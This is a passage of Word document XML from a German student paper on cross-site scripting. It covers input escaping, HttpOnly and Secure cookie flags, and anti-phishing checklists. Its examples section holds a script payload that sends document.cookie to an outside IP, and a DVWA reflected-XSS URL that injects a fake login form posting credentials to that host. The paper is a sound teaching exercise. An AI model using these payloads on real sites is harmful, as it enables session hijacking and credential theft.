      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0018412A">
        <w:t xml:space="preserve">als Maskierungszeichen </w:t>
      </w:r>
      <w:r>
        <w:t>wird der folgende Text ausgegeben:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DFF3D" w14:textId="57B12EE8" w:rsidR="00061A68" w:rsidRDefault="00061A68" w:rsidP="0018412A">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Das hier ist ein Anführungszeichen: ".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43616295" w14:textId="1772B1E1" w:rsidR="0018412A" w:rsidRDefault="000C654F" w:rsidP="0018412A">
      <w:r>
        <w:t xml:space="preserve">PHP z.B. stellt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sp</w:t>
      </w:r>
      <w:r w:rsidR="00AF7E6C">
        <w:t>etzielle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF7E6C">
        <w:t xml:space="preserve"> Methoden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zur Verfügung, mit denen man die Benutzereingaben prüfen und anpassen kann. Ein Beispiel dafür ist die </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AF7E6C">
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF7E6C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AF7E6C">
        <w:t>) Methode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261EB3A5" w14:textId="1E69738D" w:rsidR="00A52679" w:rsidRDefault="00A52679" w:rsidP="0018412A">
      <w:r>
        <w:t xml:space="preserve">Eine weitere Massnahme ist es </w:t>
      </w:r>
      <w:r w:rsidR="00B91B23">
        <w:t>Metazeichen in Zeichenreferenzen umzuwandeln.</w:t>
      </w:r>
      <w:r w:rsidR="0055037B">
        <w:t xml:space="preserve"> Dabei werden </w:t>
      </w:r>
      <w:r w:rsidR="001220F6">
        <w:t>Sonderzeichen</w:t>
      </w:r>
      <w:r w:rsidR="0055037B">
        <w:t xml:space="preserve">, wie z.B. </w:t>
      </w:r>
      <w:r w:rsidR="00D4345A">
        <w:t xml:space="preserve">ä, ö, ü, </w:t>
      </w:r>
      <w:r w:rsidR="0055037B">
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidR="001220F6">
        <w:t xml:space="preserve"> oder andere als HTML</w:t>
      </w:r>
      <w:r w:rsidR="00D4345A">
        <w:t xml:space="preserve"> Referenz gespeichert</w:t>
      </w:r>
      <w:r w:rsidR="00AA63D4">
        <w:t xml:space="preserve">, welche so aussehen: </w:t>
      </w:r>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t>auml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="000926AB">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t xml:space="preserve"> &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t>ouml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00233C29">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t xml:space="preserve"> &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t>uuml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="000926AB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t>amp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000926AB" w:rsidRPr="000926AB">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03384C46" w14:textId="244F8215" w:rsidR="003B47AD" w:rsidRDefault="003B47AD" w:rsidP="003B47AD">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc25335924"/>
      <w:r>
        <w:t>Beispiele</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidR="00446B5F">
        <w:rPr>
          <w:rStyle w:val="Funotenzeichen"/>
        </w:rPr>
        <w:footnoteReference w:id="2"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2DE84" w14:textId="77777777" w:rsidR="003B47AD" w:rsidRDefault="003B47AD" w:rsidP="003B47AD">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc25335925"/>
      <w:r>
        <w:t xml:space="preserve">Session </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Highjacking</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31AF3391" w14:textId="77777777" w:rsidR="003B47AD" w:rsidRDefault="003B47AD" w:rsidP="003B47AD">
      <w:r>
        <w:t xml:space="preserve">Wenn ein Session Cookie keine </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HTTPOnly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enthält kann ein Script auf das Cookie zugreifen. Der folgende Code sendet einen HTTP Request an die angegebene IP-Adresse, wo man das Cookie dann aus der übertragenen URL auslesen kann:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295A0257" w14:textId="77777777" w:rsidR="003B47AD" w:rsidRPr="00B94BA7" w:rsidRDefault="003B47AD" w:rsidP="003B47AD">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94BA7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D189413" w14:textId="4101FFB6" w:rsidR="003B47AD" w:rsidRPr="00446B5F" w:rsidRDefault="003B47AD" w:rsidP="003B47AD">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:r w:rsidRPr="00446B5F">
        <w:t>Schutzmassnahmen</w:t>
      </w:r>
      <w:r w:rsidR="00446B5F">
        <w:rPr>
          <w:rStyle w:val="Funotenzeichen"/>
        </w:rPr>
        <w:footnoteReference w:id="3"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F5A041" w14:textId="27F011F8" w:rsidR="003B47AD" w:rsidRPr="00DC7B0B" w:rsidRDefault="003B47AD" w:rsidP="003B47AD">
      <w:r w:rsidRPr="00DC7B0B">
        <w:t xml:space="preserve">Mit einem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC7B0B">
        <w:t>HTTPOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC7B0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC7B0B">
        <w:t>Flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC7B0B">
        <w:t xml:space="preserve"> wird verhindert, dass Cookies von Script</w:t>
      </w:r>
      <w:r w:rsidR="00F8303E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC7B0B">
        <w:t xml:space="preserve"> ausgelesen w</w:t>
      </w:r>
      <w:r w:rsidR="00F8303E">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC7B0B">
        <w:t>rden können:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1411A120" w14:textId="4132B118" w:rsidR="003B47AD" w:rsidRDefault="003B47AD" w:rsidP="003B47AD">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00201BF8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00201BF8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CookieName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00201BF8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=Wert; path=/; H</w:t>
      </w:r>
      <w:r w:rsidR="00664E7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttp</w:t>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="00201BF8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F155B" w14:textId="77777777" w:rsidR="003B47AD" w:rsidRDefault="003B47AD" w:rsidP="003B47AD">
      <w:r w:rsidRPr="00201BF8">
        <w:t xml:space="preserve">Mit dem Secure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00201BF8">
        <w:t>Flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00201BF8">
        <w:t xml:space="preserve"> kann man </w:t>
      </w:r>
      <w:r>
        <w:t>zudem festlegen, dass das Cookie nur über sichere HTTPS Verbindungen gesendet wird:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C2F788" w14:textId="77777777" w:rsidR="003B47AD" w:rsidRPr="00976AFF" w:rsidRDefault="003B47AD" w:rsidP="003B47AD">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00976AFF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976AFF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CookieName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976AFF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=Wert; path=/; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976AFF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976AFF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F1471" w14:textId="77777777" w:rsidR="003B47AD" w:rsidRPr="00413974" w:rsidRDefault="003B47AD" w:rsidP="003B47AD">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc25335926"/>
      <w:r w:rsidRPr="00413974">
        <w:t>Phishing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="4E829B06" w14:textId="6AD132E4" w:rsidR="003B47AD" w:rsidRDefault="00413974" w:rsidP="0018412A">
      <w:r>
        <w:t xml:space="preserve">Mit einer </w:t>
      </w:r>
      <w:r w:rsidR="000F264A">
        <w:t>manipulierten</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL kann man dem O</w:t>
      </w:r>
      <w:r w:rsidR="000F264A">
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>fer auch ein Formular anzeigen, in der Hoffnung</w:t>
      </w:r>
      <w:r w:rsidR="000F264A">
        <w:t>, dass es dort seine Zugangsdaten eingibt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A4D29" w14:textId="38D91343" w:rsidR="000F264A" w:rsidRDefault="00535580" w:rsidP="00535580">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://localhost:81/DVWA/vulnerabilities/xss_r/?name=&lt;h3&gt;Please login to proceed&lt;/h3&gt; &lt;form action=http://192.168.149.128&gt;Username:&lt;br&gt;&lt;input type="username" name="username"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;Password:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&lt;input type="password" name="password"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&lt;input type="submit" value="Logon"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B012BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC4CCF9" w14:textId="7D06403B" w:rsidR="00B012BB" w:rsidRDefault="00B012BB" w:rsidP="00B012BB">
      <w:r w:rsidRPr="00B012BB">
        <w:t>Wenn das klappt kann man sich danach einfach mit den Zugangsdaten</w:t>
      </w:r>
      <w:r w:rsidR="00F44D3C">
        <w:t xml:space="preserve"> bei dem Dienst anmelden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB233F" w14:textId="3F7750C9" w:rsidR="00BB1219" w:rsidRPr="00B012BB" w:rsidRDefault="00BB1219" w:rsidP="00385FEB">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6760"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Schutzmassnahmen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320122AA" w14:textId="12DE7D6F" w:rsidR="00BB1219" w:rsidRDefault="00BB1219" w:rsidP="00BB1219">
      <w:bookmarkStart w:id="13" w:name="_Toc25335927"/>
      <w:r>
        <w:t>Gegen solche Angriffe kann man sich n</w:t>
      </w:r>
      <w:r w:rsidR="003B450E">
        <w:t xml:space="preserve">icht wirklich schützen. </w:t>
      </w:r>
      <w:r w:rsidR="00385FEB">
        <w:t>Aber</w:t>
      </w:r>
      <w:r w:rsidR="003B450E">
        <w:t xml:space="preserve"> man kann lernen nicht darauf hereinzufallen, in dem man </w:t>
      </w:r>
      <w:r w:rsidR="0026777B">
        <w:t xml:space="preserve">darauf achtet, wo man seine Zugangsdaten </w:t>
      </w:r>
      <w:r w:rsidR="0026777B">
        <w:lastRenderedPageBreak/>
        <w:t>eingibt und bei E-Mails prinzipiell etwas misstrausch ist</w:t>
      </w:r>
      <w:r w:rsidR="00385FEB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0039747D">
        <w:t xml:space="preserve"> Es gibt dazu auch "Checklisten"</w:t>
      </w:r>
      <w:r w:rsidR="009E71B5">
        <w:t xml:space="preserve">, an die man sich halten kann, z.B. </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="009E71B5" w:rsidRPr="009E71B5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>diese</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00857024">
        <w:t xml:space="preserve"> oder </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00857024" w:rsidRPr="00857024">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>diese</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009E71B5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F777DFA" w14:textId="451AD8EF" w:rsidR="006E0D14" w:rsidRDefault="006E0D14" w:rsidP="00292EAE">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:r>
        <w:t>Quellen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="327983E8" w14:textId="798F169C" w:rsidR="006E0D14" w:rsidRPr="00EE3D0F" w:rsidRDefault="00A033AB" w:rsidP="00664E7A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3D0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Wikipedia: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00EE3D0F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://de.wikipedia.org/wiki/Cross-Site-Scripting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="283046B7" w14:textId="62509397" w:rsidR="00292EAE" w:rsidRPr="00EE3D0F" w:rsidRDefault="00A033AB" w:rsidP="00664E7A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3D0F">
        <w:t xml:space="preserve">Beispielangriffe: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00EE3D0F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pentest-tools.com/blog/xss-attacks-practical-scenarios/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6044F59C" w14:textId="52837BDC" w:rsidR="00292EAE" w:rsidRPr="00EE3D0F" w:rsidRDefault="00DA3D45" w:rsidP="00664E7A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3D0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sichere</w:t>
      </w:r>
      <w:r w:rsidR="00DF12CE" w:rsidRPr="00EE3D0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookies:</w:t>
      </w:r>
      <w:r w:rsidR="00A033AB" w:rsidRPr="00EE3D0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00A033AB" w:rsidRPr="00EE3D0F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://wiki.selfhtml.org/wiki/Grundlagen/sichere_Cookies</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D962D21" w14:textId="49CC73F0" w:rsidR="00AC0621" w:rsidRPr="00EE3D0F" w:rsidRDefault="00AC0621" w:rsidP="00664E7A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3D0F">
        <w:t xml:space="preserve">Checkliste gegen Phishing 1: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00EE3D0F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.bsi-fuer-buerger.de/BSIFB/DE/Risiken/SpamPhishingCo/Phishing/Schutzmassnamen/schutzmassnamen_node.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E94C50D" w14:textId="5F5241C2" w:rsidR="00AC0621" w:rsidRPr="00EE3D0F" w:rsidRDefault="00AC0621" w:rsidP="00664E7A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3D0F">
        <w:t>Checkliste gegen Phishing 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3D0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00EE3D0F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.konsumentenschutz.ch/wie-kann-man-sich-vor-phishing-schuetzen/?gclid=Cj0KCQiAq97uBRCwARIsADTziyYs7o9EwkR_YbyBJZRSYHOeoC6OjvO2wkZumzK1Z6ZVnwsKT5_sf_gaAgEKEALw_wcB</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00AC0621" w:rsidRPr="00EE3D0F" w:rsidSect="0086761E">
      <w:footerReference w:type="default" r:id="rId16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B6D5B" w14:textId="77777777" w:rsidR="00E01303" w:rsidRDefault="00E01303" w:rsidP="004D24DF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="029A5820" w14:textId="77777777" w:rsidR="00E01303" w:rsidRDefault="00E01303" w:rsidP="004D2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67DBF" w14:textId="4BB4442F" w:rsidR="004D24DF" w:rsidRPr="00091F56" w:rsidRDefault="004D24DF" w:rsidP="00091F56">
    <w:pPr>
      <w:pStyle w:val="Fuzeile"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
      </w:tabs>
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00091F56">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Stephanie Kessler</w:t>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>, M151</w:t>
    </w:r>
    <w:r w:rsidR="00091F56">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Seite </w:t>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> von </w:t>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="003A263F">
      <w:rPr>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40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43E5C" w14:textId="77777777" w:rsidR="00E01303" w:rsidRDefault="00E01303" w:rsidP="004D24DF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="52E288EB" w14:textId="77777777" w:rsidR="00E01303" w:rsidRDefault="00E01303" w:rsidP="004D24DF">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
